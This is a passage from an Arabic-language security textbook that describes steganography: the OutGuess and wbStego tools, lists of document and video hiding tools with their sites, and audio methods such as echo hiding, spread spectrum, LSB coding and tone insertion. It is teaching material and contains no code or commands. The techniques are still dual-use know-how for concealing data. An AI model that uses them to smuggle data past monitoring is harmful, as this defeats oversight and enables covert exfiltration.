‫ﻣﺿﻐوطﺔ واﻟﻣﺿﻐوطﺔ وﯾدﻋم اﻟﻌدﯾد ﻣن ﺻﯾﻎ اﻟﺻور)‪ .BMP ،PNG ،TIFF ،JPEG (JPG‬ﻣﻊ ﺳﮭوﻟﺔ واﺟﮭﺔ اﻟﻣﺳﺗﺧدم اﻟرﺳوﻣﯾﺔ ﻓﺎﻧﮫ‬
‫ﻣن اﻟﻣﻣﻛن ﺗﺣدﯾد ﻣﻌﺎﯾر إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت‪ ،‬ﺗﻘﯾﯾم اﻟﺻورة اﺳﺗﺧدام ﻛل ﻣن ﻣﻔﺗﺎح اﻟﺗﺷﻔﯾر اﻟﻣﺗﻣﺎﺛل وﻣﻔﺗﺎح اﻟﺗﺷﻔﯾر اﻟﻐﯾر ﻣﺗﻧﺎظر‪ .‬ﯾﻣﻛن إﺧﻔﺎء‬
‫اﻟﺑﯾﺎﻧﺎت ﻛﺄﻧﮫ ﻣﻠف أرﺷﯾف ﻣﺿﻐوط‪ ،‬وأﻧﮫ ﻣن اﻟﻣﻣﻛن أﯾﺿﺎ أن ﺗﺿﯾف ﺗﻌﻠﯾﻘﺎ‪.‬‬
‫‪ Steg‬ﯾﻌﻣل ﻋﻠﻰ ﺟﻧو ‪ /‬ﻟﯾﻧﻛس‪ ،‬ﻣﺎﯾﻛروﺳوﻓت وﯾﻧدوز وأﺑل ﻣﺎك‪ ، OS X‬وﯾﻣﻛﻧك ﺗﺣﻣﯾل اﻟﺑرﻧﺎﻣﺞ ﻣﺑﺎﺷرة ﻣن اﻟﻣوﻗﻊ اﻟرﺳﻣﻲ‪.‬‬
‫ﺑﻣﺟرد ﺗﺛﺑﯾﺗﮫ ﯾﻣﻛﻧك ﺗﺷﻐﯾﻠﮫ وﺳﺗرى ﺷﯾﺋﺎ ﻣﺷﺎﺑﮭﺎ ﻟﮭذه اﻟﺻورة‪:‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪469‬‬

‫‪OutGuess -3‬‬
‫‪ OutGuess‬ھو أداة ﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ ﻋﺎﻟﻣﯾﺔ واﻟﺗﻲ ﺗﺗﯾﺢ إدﺧﺎل اﻟﻣﻌﻠوﻣﺎت اﻟﻣﺧﻔﯾﺔ ﻓﻲ اﻟﺑت زاﺋدة ﻣن ﻣﺻﺎدر اﻟﺑﯾﺎﻧﺎت‪ .‬طﺑﯾﻌﺔ ﻣﺻدر اﻟﺑﯾﺎﻧﺎت‬
‫ﻻ ﯾﻣت ﺑﺻﻠﺔ اﻟﻰ ﺟوھر ‪ .OutGuess‬ﯾﻌﺗﻣد اﻟﺑرﻧﺎﻣﺞ ﻋﻠﻰ ﻣﻌﺎﻟﺟﺎت ﺑﯾﺎﻧﺎت ﻣﺣددة اﻟﺗﻲ ﻣن ﺷﺄﻧﮭﺎ أن اﺳﺗﺧراج اﻟﺑﺎﯾت اﻟﻔﺎﺋﺿﺔ واﻟﻛﺗﺎﺑﺔ‬
‫ﻋﻠﯾﮭﺎ ﺛم ارﺟﺎﻋﮭﺎ ﻣرة أﺧرى ﺑﻌد اﻟﺗﻌدﯾل‪ .‬ﺣﺎﻟﯾﺎ ﯾدﻋم ‪ PPM‬و‪ PNM‬و‪) JPG‬ﺻﯾﻐﮫ ﺻوره(‪ ،‬أﯾﺿل ‪ OutGuess‬ﯾﻣﻛﻧﮫ اﺳﺗﺧدام أي ﻧوع‬
‫ﻣن اﻟﺑﯾﺎﻧﺎت‪ ،‬طﺎﻟﻣﺎ ﺗم ﺗوﻓﯾر اﻟﻣﻌﺎﻟﺞ‪.‬‬
‫‪ OutGuess‬ﯾﺳﺗﺧدم ‪ generic iterator object‬ﻟﺗﺣدﯾد أي ﻣن ﺑﺗﺎت اﻟﺑﯾﺎﻧﺎت اﻟﺗﻲ ﯾﺟب أن ﯾﺗم ﺗﻌدﯾﻠﮭﺎ‪ .‬و‪ seed‬ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻟﺗﻌدﯾل‬
‫ﺳﻠوك ‪ .iterator‬ﯾﻘوم ﺑﺗﺿﻣﯾن اﻟﺑﯾﺎﻧﺎت ﺟﻧﺑﺎ إﻟﻰ ﺟﻧب ﻣﻊ ﺑﻘﯾﺔ اﻟرﺳﺎﻟﺔ‪ .‬ﻋن طرﯾﻖ ﺗﻐﯾﯾر ‪ OutGuess ،seed‬ﯾﺣﺎل إﯾﺟﺎد ﺗﺳﻠﺳل ﻣن‬
‫اﻟﺑﺗﺎت واﻟذي ﯾﻘﻠل ﻋدد اﻟﺗﻐﯾﯾرات ﻓﻲ اﻟﺑﯾﺎﻧﺎت اﻟﺗﻲ ﯾﺗﻌﯾن اﻟﻘﯾﺎم ﺑﮭﺎ‪.‬‬
‫ﺑﺎﻹﺿﺎﻓﺔ إﻟﻰ ذﻟك‪ OutGuess ،‬ﯾﺳﻣﺢ ﺑﺈﺧﻔﺎء رﺳﺎﻟﺗﯾن ﻓﻲ اﻟﺑﯾﺎﻧﺎت‪ .‬ﯾﺣﺗﻔظ ﺑﺎﻟﺑﺗﺎت اﻟﺗﻲ ﺗم ﺗﻌدﯾﻠﮭﺎ ﻣﺳﺑﻘﺎ وﯾﺣﺻرھﺎ‪.‬‬
‫ﻟﺗﺷﻔﯾر ﻣﺣﺗوى ﻧﺳﺗﺧدم اﻻﺗﻲ‪:‬‬

‫ﯾﻣﻛﻧك أﯾﺿﺎ اﺳﺗﺧدام )‪ (-K‬ﺛم اﻟرﺳﺎﻟﺔ ﺑﯾن ﻋﻼﻣﺗﻲ ﺗﻧﺻﯾص ﻹﺿﺎﻓﺔ رﺳﺎﻟﺔ ﺳرﯾﮫ أﺧرى‪.‬‬
‫ﻟﻔك ﺗﺷﻔﯾر ﻣﺣﺗوى ﻧﺳﺗﺧدم اﻻﺗﻲ‪:‬‬

‫‪Document Steganography‬‬
‫ﻣﺛل طرﯾﻘﺔ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﺑداﺧل اﻟﺻور‪ ،‬إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﺑداﺧل اﻟوﺛﯾﻘﺔ ھو أﺳﻠوب ﯾﺳﺗﺧدم ﻹﺧﻔﺎء اﻟرﺳﺎﺋل اﻟﺳرﯾﺔ ﻋﻠﻰ أن ﯾﺗم ﺗﺣوﯾﻠﮭﺎ‬
‫ﻓﻲ اﻟوﺛﺎﺋﻖ‪ .‬ﯾوﺿﺢ اﻟرﺳم اﻟﺑﯾﺎﻧﻲ اﻟﺗﺎﻟﻲ ﻋﻣﻠﯾﺔ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﺑداﺧل اﻟوﺛﯾﻘﺔ‪:‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪470‬‬

‫‪Document Steganography: wbstego‬‬

‫اﻟﻣﺻدر‪http://wbstego.wbailer.com :‬‬

‫‪ Wbstego‬ھو أداة إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﻓﻲ ﻣﺳﺗﻧد‪ .‬ﺑﺎﺳﺗﺧدام ھذه اﻷداة‪ ،‬ﯾﻣﻛﻧك إﺧﻔﺎء أي ﻧوع ﻣن اﻟﻣﻠﻔﺎت ﺿﻣن أﻧواع اﻟﻣﻠﻔﺎت اﻟﻧﺎﻗﻠﺔ ﻣﺛل‬
‫‪ Windows bitmaps‬ﻣﻊ اﻷﻟوان ‪ 16‬و‪ 256‬و ‪ ،16.7m‬اﻟﻣﻠﻔﺎت اﻟﻧﺻﯾﺔ ﻣن اﻟﻧوع ‪ASCII‬أو ‪ ANSI‬وﺣﻘول ‪ HTML‬وﻣﻠﻔﺎت‬
‫‪.Adobe PDF‬‬

‫‪Document Steganography Tools‬‬


‫ﻣﺛل اﻷداة ‪ ،wbstego‬ﻓﮭﻧﺎك اﻟﻌدﯾد ﻣن اﻷدوات اﻷﺧرى اﻟﺗﻲ ﺗﺳﻣﺢ ﻟك ﺑﺈﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت داﺧل ﻣﻠﻔﺎت اﻟوﺛﺎﺋﻖ اﻷﺧرى ﻣﻊ اﻷﻧواع اﻟﻣﺧﺗﻠﻔﺔ أو‬
‫اﻻﻣﺗدادات اﻟﻣﺧﺗﻠﻔﺔ‪:‬‬
‫‪Merge Streams available at http://www.ntkernel.com‬‬
‫‪Office XML available at http://www.irongeek.com‬‬
‫‪Data Stash available at http://www.skyjuicesoftware.com‬‬
‫‪FoxHole available at http://foxhole.sourceforge.net‬‬
‫‪Xidie Security Suite available at http://www.stegano.net‬‬
‫‪Hydan available at http://www.crazyboy.com‬‬
‫‪Stegl available at http://stegj.sourceforge.net‬‬
‫‪Stegostick available at http://sourceforge.net‬‬

‫‪Video Steganography‬‬

‫‪ Video steganography‬ﯾﻧطوي ﻋﻠﻰ إﺧﻔﺎء رﺳﺎﺋل اﻟﻣﻠﻔﺎت اﻟﺳرﯾﺔ ﻣﻊ أي ﻣن اﻣﺗدادات ﻣﻠف اﻟﻔﯾدﯾو اﻟﻣﺗدﻓﻘﺔ ﺑﺎﺳﺗﻣرار‪ .‬ﯾﺗم اﺳﺗﺧدام‬
‫ﻣﻠﻔﺎت اﻟﻔﯾدﯾو ھﻧﺎ ﺑﺎﻋﺗﺑﺎرھﺎ اﻟﻧﺎﻗل ﻟﺗﺣﻣل اﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ‪ .‬ﻓﺈﻧﮫ ﯾﺣﺗﻔظ ﺑﺎﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ اﻟﺧﺎﺻﺔ ﺑك أﻛﺛر أﻣﻧﺎ‪ .‬ﻣﻠﻔﺎت اﻟﻔﯾدﯾو اﻟﻧﺎﻗﻠﺔ ھو‬
‫ﻋﺑﺎره ﻋن ﺗﯾﺎر ﻣﺗﺣرك ﻣن اﻟﺻور واﻟﺻوت‪ ،‬ﻓﺈﻧﮫ ﻣن اﻟﺻﻌب ﻟﻠﻣﺗﻠﻘﻲ ﻏﯾر اﻟﻣﻘﺻودة ﻣﻼﺣظﺔ اﻟﺗﺷوﯾش ﻓﻲ ﻣﻠف اﻟﻔﯾدﯾو اﻟﻧﺎﺟﻣﺔ ﺑﺳﺑب‬
‫اﻟرﺳﺎﻟﺔ اﻟﺳرﯾﺔ‪ .‬ﺣﯾث أﻧﮫ ﯾﻛون ﺑدون ﻣراﻗﺑﺔ ﺑﺳﺑب اﺳﺗﻣرار ﺗدﻓﻖ اﻟﻔﯾدﯾو‪ .‬ﻣﻠف ﻓﯾدﯾو ھو ﻣزﯾﺞ ﻣن اﻟﺻورة واﻟﺻوت‪ ،‬وﺟﻣﯾﻊ اﻟﺗﻘﻧﯾﺎت‬
‫اﻟﻣﺗﺎﺣﺔ ﻹﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﺑداﺧل اﻟﺻور او ﺑداﺧل اﻟﻣﻠﻔﺎت اﻟﺻوﺗﯾﺔ ﯾﻣﻛن ﺗطﺑﻘﮭﺎ أﯾﺿﺎ ﻋﻠﻰ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﻔﯾدﯾو‪ .‬وﯾﻣﻛن اﺳﺗﺧداﻣﮫ‬
‫ﻹﺧﻔﺎء ﻋدد ﻛﺑﯾر ﻣن اﻟرﺳﺎﺋل اﻟﺳرﯾﺔ‪.‬‬
‫‪Video Steganography: OmniHide PRO‬‬
‫اﻟﻣﺻدر‪http://omnihide.com :‬‬
‫‪ OmniHide PRO‬ﯾﺳﻣﺢ ﻟك ﺑﺈﺧﻔﺎء أي ﻣﻠف ﺳري داﺧل ﺻورة ﻏﯾر ﺿﺎره‪ ،‬ﻓﯾدﯾو‪ ،‬ﻣﻠﻔﺎت اﻟﻣوﺳﯾﻘﻰ‪ ،‬وﻣﺎ اﻟﻰ ذﻟك‪ .‬اﻟﻣﻠف اﻟﻧﺎﺗﺞ‪Stego‬‬
‫ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ أو ﻣﺷﺎرﻛﺗﮭﺎ ﻋﺑر اﻟﺷﺑﻛﺔ ﻣﺛل اﻟﻣﻠﻔﺎت اﻟﻌﺎدﯾﺔ دون أن ﯾﻌﻠم أﺣد أن ﺷﯾﺋﺎ ﻣﺧﻔﯾﺎ ﺑداﺧﻠﮭﺎ‪ ،‬وﺑﺎﻟﺗﺎﻟﻲ ﺗﻣﻛن ھذه اﻷداة ﺑﺣﻔظ اﻟﻣﻠف‬
‫اﻟﺳري اﻟﺧﺎص ﺑك ﻣن أﻋﯾن اﻟﻣﺗطﻔﻠﯾن‪ .‬ﻓﺈﻧﮫ ﯾﺗﯾﺢ ﻟك أﯾﺿﺎ إﺿﺎﻓﺔ ﻛﻠﻣﺔ ﻣرور ﻹﺧﻔﺎء اﻟﻣﻠﻔﺎت اﻟﺧﺎﺻﺔ ﺑك ﻟﺗﻌزﯾز اﻷﻣن‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪471‬‬

‫اﻟﻣﻣﯾزات‪:‬‬
‫‪ -‬ﯾﺳﻣﺢ ﻟك إﺧﻔﺎء اﻟﻣﻠﻔﺎت اﻟﺧﺎﺻﺔ ﺑك ﻓﻲ ﻣﻠﻔﺎت اﻟﺻور‪ ،‬أﻓﻼم‪ ،‬اﻟﻣﺳﺗﻧدات‪ ،‬واﻟﻣوﺳﯾﻘﻰ اﻟﺦ‪.‬‬
‫‪ -‬ﻟم ﺗﺿﻊ أي ﻣن اﻟﻘﯾود ﻋﻠﻰ ﻧوع اﻟﻣﻠف واﻟﺣﺟم اﻟذي ﺗرﯾد إﺧﻔﺎءه‪.‬‬

‫‪Video Steganography Tools‬‬

‫ﺑﺎﻹﺿﺎﻓﺔ إﻟﻰ اﻟﺗطﺑﯾﻖ ‪ ،PRO‬ﻓﮭﻧﺎك اﻟﻌدﯾد ﻣن اﻷدوات اﻷﺧرى اﻟﺗﻲ ﯾﻣﻛﻧك اﺳﺗﺧداﻣﮭﺎ ﻹﺧﻔﺎء ﻣﻠف اﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ اﻟﺧﺎﺻﺔ ﺑك ﻓﻲ‬
‫ﻣﻠﻔﺎت اﻟﻔﯾدﯾو‪:‬‬
‫‪Our Secret available at http://www.securekit.net‬‬
‫‪RT Steganography available at http://rtstegvideo.sourceforge.net‬‬
‫‪Masker available at http://www.softpuls.com‬‬
‫‪Max File Encryption available at http://www.softeza.com‬‬
‫‪MSU Stegovideo available at http://www.compression.ru‬‬
‫‪BDV DataHider available at http://www.bdvnotepad.com‬‬
‫‪Stegostick available at http://sourceforge.net‬‬
‫‪OpenPuff available at http://embeddedsw.net‬‬
‫‪Stegsecret available at http://stegsecret.sourceforge.net‬‬
‫‪PSM Encryptor available at http://www.softpedia.com/get/Security/Encrypting/PSM-Encryptor.shtml‬‬

‫‪Audio Steganography‬‬

‫‪ Audio steganography‬ﯾﺳﻣﺢ ﻟك ﺑﺈﺧﻔﺎء اﻟرﺳﺎﻟﺔ اﻟﺳرﯾﺔ اﻟﺧﺎﺻﺔ ﺑك ﻓﻲ ﻣﻠف اﻟﺻوت ﻣﺛل‪ ،AU ، WAV‬وﺣﺗﻰ ﻣﻠﻔﺎت ‪MP3‬‬
‫اﻟﺻوﺗﯾﺔ‪ .‬ﻓﺈﻧﮫ ﯾﺿﻣن اﻟرﺳﺎﺋل اﻟﺳرﯾﺔ ﻓﻲ اﻟﻣﻠﻔﺎت اﻟﺻوﺗﯾﺔ ﻋن طرﯾﻖ ﺗﻐﯾﯾر طﻔﯾف ﻓﻲ ﺗﺳﻠﺳل ﺛﻧﺎﺋﻲ ﻣن اﻟﻣﻠف اﻟﺻوﺗﻲ‪ .‬اﻟﺗﻐﯾﯾرات ﻓﻲ‬
‫اﻟﻣﻠف اﻟﺻوﺗﻲ ﺑﻌد اﻹدراج ﻻ ﯾﻣﻛن أن ﯾﺗم ﻛﺷﻔﮭﺎ‪ ،‬ﻟذﻟك ھذا ﯾؤﻣن اﻟرﺳﺎﻟﺔ اﻟﺳرﯾﺔ ﻣن أﻋﯾن اﻟﻣﺗطﻔﻠﯾن‪.‬‬

‫ﺗﺣﺗﺎج إﻟﻰ اﻟﺗﺄﻛد ﻣن أن اﻟﻣﻠف اﻟﺻوﺗﻲ اﻟﻧﺎﻗل ﻻ ﯾﻧﺑﻐﻲ أن ﯾﺗدھور ﺑﺷﻛل ﻛﺑﯾر ﺑﺳﺑب اﻟﺑﯾﺎﻧﺎت اﻟﺳرﯾﺔ اﻟﻣدﻣﺟﺔ؛ ﻋﻠﻰ اﻟﺟﺎﻧب اﻻﺧر‪ ،‬ﯾﻣﻛن‬
‫‪) eavesdropper‬اﻟﻣﺗﻧﺻت( ﻣن اﻟﻛﺷف ﻋن وﺟود رﺳﺎﻟﺔ ﺳرﯾﮫ ﻣﺧﺑﺄه ﻓﻲ اﻟﻣﻠف اﻟﺻوﺗﻲ‪ .‬ﻟذﻟك ﯾﺟب ﺗﺿﻣﯾن اﻟﺑﯾﺎﻧﺎت اﻟﺳرﯾﺔ ﺑطرﯾﻘﮫ ﻣﺎ‬
‫ﺑﺣﯾث ﯾﻛون ھﻧﺎك ﺗﻐﯾﯾرا طﻔﯾﻔﺎ ﻓﻲ اﻟﻣﻠف اﻟﺻوﺗﻲ اﻟذي ﻻ ﯾﻣﻛن اﻟﻛﺷف ﻋﻧﮭﺎ ﻣن ﻗﺑل اﻹﻧﺳﺎن‪ .‬ﯾﻣﻛن إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﻓﻲ اﻟﻣﻠف اﻟﺻوﺗﻲ‬
‫ﺑﺎﺳﺗﺧدام ‪ LSB‬أو ﺑﺎﺳﺗﺧدام ﺗرددات اﻟﺗﻲ ھﻲ ﻏﯾر ﻣﺳﻣوﻋﺔ ﺑﺎﻟﻧﺳﺑﺔ ﻟﻸذن اﻟﺑﺷرﯾﺔ )‪.(>20,000Hz‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪472‬‬

‫‪) Audio Steganography Methods‬طﺮق إﺧﻔﺎء اﻟﻤﻌﻠﻮﻣﺎت ﻓﻲ اﻟﻤﻠﻔﺎت اﻟﺼﻮﺗﯿﺔ(‬

‫ھﻧﺎك ﺑﻌض اﻟطرق اﻟﻣﺗﺎﺣﺔ ﻹﺧﻔﺎء اﻟرﺳﺎﺋل اﻟﺳرﯾﺔ اﻟﺧﺎﺻﺔ ﺑك ﻓﻲ ﻣﻠﻔﺎت اﻟﺻوت‪ .‬ﺑﻌض اﻷﺳﺎﻟﯾب ﺗﻘوم ﺑﺗﻧﻔﯾذ اﻟﺧوارزﻣﯾﺔ اﻟﺗﻲ ﺗﻘوم ﻋﻠﻰ‬
‫إدﺧﺎل اﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ ﻋﻠﻰ ﺷﻛل إﺷﺎرة اﻟﺿوﺿﺎء)‪ ، (noise signal‬ﺑﯾﻧﻣﺎ اﻟﺑﻌض اﻻﺧر ﯾﺳﺗﺧدم أﺳﺎﻟﯾب أﺧرى ﻓﻲ ‪exploiting‬‬
‫)اﺧﺗراق( ﺗﻘﻧﯾﺎت ﻣﻌﺎﻟﺟﺔ اﻹﺷﺎرات اﻟﻣﺗطورة ﻹﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت‪.‬‬
‫ﺗﺳﺗﺧدم اﻷﺳﺎﻟﯾب اﻟﺗﺎﻟﯾﺔ ﻟﺗﻧﻔﯾذ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ ﻓﻲ ﻣﻠﻔﺎت اﻟﺻوت‪:‬‬

‫‪Echo Data Hiding -1‬‬


‫ﻓﻲ ‪ ،the echo data hiding method‬ﯾﺗم ﺗﺿﻣﯾن اﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ داﺧل إﺷﺎرة ﻧﺎﻗل اﻟﺻوت ﻋن طرﯾﻖ إدﺧﺎل ﺻدى )‪(Echo‬ﻓﻲ‬
‫ذﻟك‪ .‬ﯾﺳﺗﺧدم ﺛﻼث ﻣﻌﺎﻣﻼت ﻣن اﻟﺻدى)‪ ،(Echo‬وھم اﻟﺳﻌﺔ اﻷوﻟﯾﺔ)‪ ، (initial amplitude‬ﻣﻌدل اﻻﻧﺣﻼل)‪ ، (decay rate‬اﻟﺗﺄﺧﯾر‬
‫)‪ (offset or delay‬وذﻟك ﻹﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت اﻟﺳرﯾﺔ‪ .‬ﻋﻧد اﻹزاﺣﺔ ﺑﯾن إﺷﺎرة اﻟﻧﺎﻗل )‪ (Carrier signal‬واﻧﺧﻔﺎض اﻟﺻدى)‪، (echo decreases‬‬
‫ﻓﺎن ھذﯾن اﻹﺷﺎرﺗﯾن ﺳوف ﯾﺧﺗﻠطوا ﻋﻧد ﻧﻘطﺔ ﻣﻌﯾﻧﺔ ﻣن اﻟزﻣن ﺣﯾث أﻧﮫ ﻣن ﻏﯾر اﻟﻣﻣﻛن ﻟﻸذن اﻟﺑﺷرﯾﺔ اﻟﺗﻣﯾﯾز ﺑﯾن ھذه إﺷﺎرة اﺛﻧﯾن‪ .‬ﻋﻧد ھذه‬
‫اﻟﻧﻘطﺔ‪ ،‬ﯾﻣﻛن أن ﯾﺳﻣﻊ ﻟﺻوت اﻟﺻدى)‪ (Echo sound‬ﺑﺎﻋﺗﺑﺎره ﺻدى ﻣﺿﺎﻓﮫ إﻟﻰ اﻹﺷﺎرة اﻷﺻﻠﯾﺔ‪ .‬وﻣﻊ ذﻟك‪ ،‬ھذه اﻟﻧﻘطﺔ ﻣن ﻋدم ﺗﻣﯾز‬
‫اﻷﺻوات ﯾﻌﺗﻣد ﻋﻠﻰ ﻋواﻣل ﻣﺛل ﻧوﻋﯾﺔ إﺷﺎرة اﻟﺻوت اﻷﺻﻠﻲ‪ ،‬وﻧوع اﻟﺻوت‪ ،‬واﻟﻣﺳﺗﻣﻊ‪.‬‬
‫ﻟﺗﺷﻔﯾر اﻻﺷﺎرة اﻟﻧﺎﺗﺟﺔ ﻓﻲ اﻟﺷﻛل اﻟﺛﻧﺎﺋﻲ )‪ ،(Binary form‬ﯾﺗم اﺳﺗﺧدام اﺛﻧﯾن ﻣن ‪) delay times‬وﻗت اﻟﺗﺄﺧﯾر( اﻟﻣﺧﺗﻠﻔﺔ‪ .‬وﯾﻧﺑﻐﻲ أن ﺗﻛون‬
‫أوﻗﺎت اﻟﺗﺄﺧﯾر ھذه أدﻧﻰ ﻣن اﻹدراك اﻟﺑﺷري‪ .‬وﯾﻧﺑﻐﻲ أﯾﺿﺎ ﺗﻌﯾﯾن اﻟﻣﻌﺎﻣﻼت ﻣﺛل اﻟﺳﻌﺔ اﻷوﻟﯾﺔ)‪ (initial amplitude‬وﻣﻌدل اﻻﻧﺣﻼل‬
‫)‪ (decay rate‬أدﻧﻰ ﻣن اﻟﻘﯾم اﻟﻣﺳﻣوﻋﺔ ﺑﺣﯾث ﯾﺻﺑﺢ اﻟﺻوت ﻟﯾس ﻣﺳﻣوﻋﺎ ﻋﻠﻰ اﻹطﻼق‪.‬‬
‫‪Spread Spectrum Method -2‬‬
‫ﻓﻲ ھذه اﻟطرﯾﻘﺔ‪ ،‬ﯾﺗم ﻧﺷر اﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ ﻋﺑر أﻛﺑر ﻗدر ﻣﻣﻛن ﻣن اﻟطﯾف اﻟﺗرددي)‪ . (frequency spectrum‬ﯾﺳﺗﺧدم ھذا اﻷﺳﻠوب‬
‫ﻧﺳﺧﺗﯾن ﻣن اﻧﺗﺷﺎر اﻟطﯾف)‪ (spread spectrum‬وھﻣﺎ‪:‬‬
‫)‪ Direct sequence spread spectrum (DSSS‬و )‪frequency hopping spread spectrum (FHSS‬‬
‫ﻓﻲ‪ ، DSSS‬ﯾﺗم ﻧﺷر اﻟرﺳﺎﻟﺔ اﻟﺳرﯾﺔ ﻣن ﻗﺑل ‪) chip rate‬ﺛﺎﺑت( ﺛم ﯾﺗم ﺗﺿﻣﯾﻧﮫ ﻣﻊ اﺷﺎرة ﻋﺷواﺋﯾﺔ زاﺋﻔﮫ)‪(pseudo-random signal‬‬
‫واﻟﺗﻲ ﯾﺗم ﺗﺷﺎﺑﻛﮭﺎ ﻣﻊ اﻹﺷﺎرة اﻟﻐطﺎء‪.‬‬
‫ﻓﻲ ‪ ،FHSS‬ﯾﺗم ﺗﺑدﯾل طﯾف ﺗرددات اﻟﻣﻠف اﻟﺻوﺗﻲ ﻟذﻟك ﻓﺄﻧﮫ ﯾﻘﻔز ﺑﺳرﻋﮫ ﺑﯾن اﻟﺗرددات‪ .‬طرﯾﻘﺔ اﻧﺗﺷﺎر اﻟطﯾف ﯾﻠﻌب دورا رﺋﯾﺳﯾﺎ ﻓﻲ‬
‫اﻻﺗﺻﺎﻻت اﻵﻣﻧﺔ‪ ،‬ﺳواء اﻟﺗﺟﺎرﯾﺔ واﻟﻌﺳﻛرﯾﺔ‪.‬‬
‫‪LSB Coding -3‬‬
‫‪ LSB encoding‬ﺗﻌﻣل ﻣﺛل ﺗﻘﻧﯾﺔ ‪ LSB insertion‬واﻟﺗﻲ ﯾﺗم ﻓﯾﮭﺎ إدراج اﻟرﺳﺎﻟﺔ اﻟﺳرﯾﺔ اﻟﺛﻧﺎﺋﯾﺔ)‪ (BINARY‬ﻓﻲ اﻟﺑت اﻷﻗل أھﻣﯾﺔ ﻟﻛل‬
‫ﻧﻘطﺔ ﻣن إﺷﺎرة اﻟﺻوت‪ .‬ھذه اﻟطرﯾﻘﺔ ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻹﺧﻔﺎء ﻛﻣﯾﺎت ﻛﺑﯾرة ﻣن اﻟﺑﯾﺎﻧﺎت اﻟﺳرﯾﺔ‪ .‬ﻓﻣن اﻟﻣﻣﻛن اﺳﺗﺧدام اﺧر اﺛﻧﯾن ﻣن اﻟﺑت‬
‫ﻹدﺧﺎل اﻟﺑﯾﺎﻧﺎت اﻟﺛﻧﺎﺋﯾﺔ اﻟﺳرﯾﺔ وﻟﻛن اﻟﻣﺷﻛﻠﺔ أن ھذا ﺳوف ﯾﻧﺷﺎ ﺿوﺿﺎء ﻓﻲ اﻟﻣﻠف اﻟﺻوﺗﻲ‪ .‬ھذه اﻟطرﯾﻘﺔ ﺗﻔﺗﻘر اﻟﻰ اﻻﻣن ﺣﯾث ان اﻟﺗﻼﻋب‬
‫ﻓﻲ ﻣﻠف اﻟﺻوت ﯾﺟﻌل ھذه اﻟطرﯾﻘﺔ أﻗل ﻋﻠﻰ اﻟﺗﻛﯾف‪ .‬اﻟﺑﯾﺎﻧﺎت اﻟﻣﺧﻔﯾﺔ ﯾﻣﻛن اﻟﺗﻌرف ﻋﻠﯾﮭﺎ ﺑﺳﮭوﻟﺔ واﺳﺗﺧراﺟﮭﺎ ﺑﺳﺑب ﻗﻧﺎة اﻟﺿوﺿﺎء‬
‫)‪ (Channel noise‬و‪.resampling‬‬
‫‪Tone Insertion -4‬‬
‫ﯾﻧطوي ھذا اﻷﺳﻠوب ﻋﻠﻰ ﺗﺿﻣﯾن اﻟﺑﯾﺎﻧﺎت ﻓﻲ إﺷﺎرة اﻟﺻوت ﻋن طرﯾﻖ إدﺧﺎل ﻧﻐﻣﺎت ﻣﻧﺧﻔﺿﺔ اﻟطﺎﻗﺔ‪ .‬اﻟﻧﻐﻣﺎت ﻣﻧﺧﻔﺿﺔ اﻟطﺎﻗﺔ ھذه ﻟﯾﺳت‬
‫ﻣﺳﻣوﻋﺔ ﻓﻲ وﺟود إﺷﺎرات اﻟﺻوت اﻷﻋﻠﻰ ﺑﻛﺛﯾر‪ .‬ﻛﻣﺎ أﻧﮭﺎ ﻟﯾﺳت ﻣﺳﻣوﻋﺔ‪ ،‬ﻓﺈﻧﮫ ﯾﺧﻔﻲ وﺟود اﻟرﺳﺎﻟﺔ اﻟﺳرﯾﺔ اﻟﺧﺎص ﺑك‪ .‬ﻓﻣن اﻟﺻﻌب‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪473‬‬

